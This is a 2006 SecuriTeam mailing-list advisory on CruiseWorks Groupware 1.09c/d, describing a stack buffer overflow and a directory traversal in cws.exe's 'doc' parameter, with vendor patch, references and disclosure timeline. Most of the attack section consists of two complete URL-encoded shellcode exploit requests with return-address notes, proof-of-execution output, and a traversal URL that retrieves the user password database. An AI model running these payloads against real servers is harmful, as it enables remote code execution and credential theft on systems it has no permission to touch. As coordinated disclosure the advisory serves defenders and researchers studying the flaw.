[NT] CruiseWorks Buffer Overflow and Directory Traversal

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



CruiseWorks Buffer Overflow and Directory Traversal
------------------------------------------------------------------------


SUMMARY

Two vulnerabilities have been found in
<http://www.kynos.co.jp/cruise/cws/home.shtml> CruiseWorks.

When exploited, the vulnerabilities allow an authenticated user to
retrieve arbitrary files accessible to the web server process and to
execute arbitrary code with privileges of the IIS IUSR_MACHINE account.

DETAILS

Vulnerable Systems:
* CruiseWorks Groupware version 1.09c
* CruiseWorks Groupware version 1.09d

CruiseWorks cws.exe "doc" Parameter Buffer Overflow:
CruiseWorks does not properly validate the "doc" parameter in
"/scripts/cruise/cws.exe" before using it to construct a path using the
"sprintf()" function. This allows a malicious user to cause a stack-based
buffer overflow and to execute code with privileges of the IIS
IUSR_MACHINE account.

The vulnerability exists in cws.exe in a function that resembles the
following:
function_42AED0(char *valueOfDocParam)
{
char overflowedBuffer[0x200]; // 512 bytes
...
...
...

// Buffer overflow occurs when length of "doc" parameter > 512
bytes!!!
// Approximately 529 bytes is needed to overwrite saved EIP.

sprintf(overflowedBuffer, "%s\\docs\\%s", getScriptDirectory(),
valueOfDocParam);
...
...
}

For Example:
http://192.168.1.111/Scripts/cruise/cws.exe?doc=AAAAAAAAAA..[Approx. 529
bytes]..AAAAAAAAA

The buffer overflow vulnerability exists in cws.exe which is executed by
IIS or other webserver as an external CGI process when a HTTP request is
received. By supplying an overly long value to the "doc" parameter,
cws.exe will crash.

However, it is tricky to observe the buffer overflow since cws.exe will
crash silently without activating the "Just In Time Debugger", and there
is no time to manually attach Ollydbg to the cws.exe process before it
crashes. For more information on how to observe and test the buffer
overflow, see this <http://vuln.sg/cruiseworks109d-en.html> page.

POC Exploit:

The following POC will exploit the vulnerability to create files in the
"\windows\temp\" or "\winnt\temp\" directory. It has been tested to work
on English WinXP SP2 and Japanese Win2K SP4.

NOTE: The shellcode will also sound the speaker continuously.

Copy-and-paste this entire request to the browser addressbar after you
logon to CruiseWorks. Remember to change the IP address

Example Exploit 1 (requires logon):
Note: Exploit 1 uses address of JMP ESI in ntdll.dll to return into the
shellcode.

http://192.168.1.111/Scripts/cruise/cws.exe?doc=%90%EB%5E%60%8B%5C%24%28
%8B%73%3C%8B%74%33%78%03%F3%8B%7E%20%03%FB%8B%4E%18%56%33%D2%8B
%37%03%74%24%2C%33%DB%33%C0%AC%85%C0%74%09%C1%CB%0C%D1%CB%03%D8
%EB%F0%3B%5C%24%28%74%0B%83%C7%04%42%E2%DC%5E%33%C0%EB%1A%5E%8B
%7E%24%03%7C%24%28%66%8B%04%57%8B%7E%1C%03%7C%24%28%8B%04%87%01
%44%24%28%61%C3%8B%EC%33%C9%B1%C8%2B%E1%B1%30%64%8B%01%8B%40%0C
%8B%70%1C%AD%8B%78%08%57%68%33%CA%8A%5B%E8%80%FF%FF%FF%58%58%33
%C9%66%B9%90%01%2B%E1%54%51%FF%D0%8B%F4%03%F0%C7%06%41%41%41%41
%C7%46%04%42%42%42%42%C7%46%08%42%42%42%42%33%DB%89%5E%0C%33%C9
%B1%14%B8%01%01%01%01%01%46%08%51%57%BB%A5%17%FF%7C%33%C0%B0%FF
%C1%E0%10%33%D8%53%E8%33%FF%FF%FF%58%58%33%DB%59%8B%D4%51%53%53
%6A%02%53%53%53%52%FF%D0%59%E2%CD%57%68%8E%4E%0E%EC%E8%13%FF%FF
%FF%58%58%BB%AA%AA%6C%6C%C1%EB%10%53%68%33%32%2E%64%68%75%73%65
%72%54%FF%D0%8B%F0%56%68%57%A0%B5%BB%E8%EE%FE%FF%FF%58%58%6A%FF%FF
%D0%57%68%B0%49%2D%DB%E8%DD%FE%FF%FF%58%58%33%DB%66%BB%E8%03%53
%FF%D0%EB%D7%57%68%7E%D8%E2%73%E8%C5%FE%FF%FF%58%58%FF%D0%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%63%15%f8%77
%41%7C%3E%90%7C

Example Exploit 2 (requires logon):
Note: Exploit 2 uses address of CALL ESI in cws.exe to return into the
shellcode. It should work on WinXP SP2 systems regardless of language.

http://192.168.1.111/scripts/cruise/cws.exe?doc=%90%EB%5E%60%8B%5C%24%28
%8B%73%3C%8B%74%33%78%03%F3%8B%7E%20%03%FB%8B%4E%18%56%33%D2%8B
%37%03%74%24%2C%33%DB%33%C0%AC%85%C0%74%09%C1%CB%0C%D1%CB%03%D8
%EB%F0%3B%5C%24%28%74%0B%83%C7%04%42%E2%DC%5E%33%C0%EB%1A%5E%8B
%7E%24%03%7C%24%28%66%8B%04%57%8B%7E%1C%03%7C%24%28%8B%04%87%01
%44%24%28%61%C3%8B%EC%33%C9%B1%C8%2B%E1%B1%30%64%8B%01%8B%40%0C
%8B%70%1C%AD%8B%78%08%57%68%33%CA%8A%5B%E8%80%FF%FF%FF%58%58%33
%C9%66%B9%90%01%2B%E1%54%51%FF%D0%8B%F4%03%F0%C7%06%41%41%41%41
%C7%46%04%42%42%42%42%C7%46%08%42%42%42%42%33%DB%89%5E%0C%33%C9
%B1%14%B8%01%01%01%01%01%46%08%51%57%BB%A5%17%FF%7C%33%C0%B0%FF
%C1%E0%10%33%D8%53%E8%33%FF%FF%FF%58%58%33%DB%59%8B%D4%51%53%53
%6A%02%53%53%53%52%FF%D0%59%E2%CD%57%68%8E%4E%0E%EC%E8%13%FF%FF
%FF%58%58%BB%AA%AA%6C%6C%C1%EB%10%53%68%33%32%2E%64%68%75%73%65
%72%54%FF%D0%8B%F0%56%68%57%A0%B5%BB%E8%EE%FE%FF%FF%58%58%6A%FF%FF
%D0%57%68%B0%49%2D%DB%E8%DD%FE%FF%FF%58%58%33%DB%66%BB%E8%03%53
%FF%D0%EB%D7%57%68%7E%D8%E2%73%E8%C5%FE%FF%FF%58%58%FF%D0%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%63%15%f8%77
%41%7D%C3%40

Successful exploit will create the following files in the Windows temp
directory.

E:\WINDOWS\Temp>dir/w
Volume in drive E has no label.
Volume Serial Number is CC58-3912

Directory of E:\WINDOWS\Temp

[.] [..] AAAABBBBCCCC AAAABBBBDDDD AAAABBBBEEEE
AAAABBBBFFFF AAAABBBBGGGG AAAABBBBHHHH AAAABBBBIIII AAAABBBBJJJJ
AAAABBBBKKKK AAAABBBBLLLL AAAABBBBMMMM AAAABBBBNNNN AAAABBBBOOOO
AAAABBBBPPPP AAAABBBBQQQQ AAAABBBBRRRR AAAABBBBSSSS AAAABBBBTTTT
AAAABBBBUUUU AAAABBBBVVVV
20 File(s) 0 bytes
2 Dir(s) 7,973,191,680 bytes free

CruiseWorks cws.exe "doc" Parameter Directory Traversal:
CruiseWorks does not properly validate the "doc" parameter in
"/scripts/cruise/cws.exe" before using it to retrieve files for display.
This allows a malicious user to disclose the content of arbitrary files
accessible to the web server process using directory traversal characters.

Example (to retrieve the system database that contains passwords, requires
logon):
http://192.168.1.111/Scripts/cruise/cws.exe?doc=../data/system.wdb

NOTE: Users passwords are stored in the "/scripts/cruise/data/system.wdb"
file. This file is within the accessible "/scripts/cruise" directory.
However, in a properly hardened server, the IIS read permission is
probably removed from the "/scripts/cruise/data" directory. Using this
vulnerability it is possible to retrieve the file.

Patch Availability:
Update to version
<http://www.kynos.co.jp/cruise/cws/cwsdownload_upinfo1_09e.html> 1.09e.

References:
<http://www.kynos.co.jp/cruise/cws/cwsdownload_upinfo1_09e.html>
http://www.kynos.co.jp/cruise/cws/cwsdownload_upinfo1_09e.html
<http://jvn.jp/cert/JVNVU%23176908/index.html>
http://jvn.jp/cert/JVNVU%23176908/index.html
<http://jvn.jp/cert/JVNVU%23338652/index.html>
http://jvn.jp/cert/JVNVU%23338652/index.html

Disclosure Timeline:
* 2006-07-19 - Vulnerability Discovered.
* 2006-07-20 - Initial Vendor Notification by Email (no reply).
* 2006-07-21 - Second Vendor Notification by Email (no reply).
* 2006-07-25 - Third Vendor Notification by Web Form (no reply).
* 2006-07-26 - Fourth Vendor Notification by Email (no reply).
* 2006-07-31 - Vulnerability reported to JPCERT/CC.
* 2006-08-14 - Additional information with updated POC exploit sent to
JPCERT/CC.
* 2006-10-24 - Coordinated Public Disclosure.


ADDITIONAL INFORMATION

The information has been provided by <mailto:chewkeong@xxxxxxx> Tan Chew
Keong.
The original article can be found at:
<http://vuln.sg/cruiseworks109d-en.html>
http://vuln.sg/cruiseworks109d-en.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.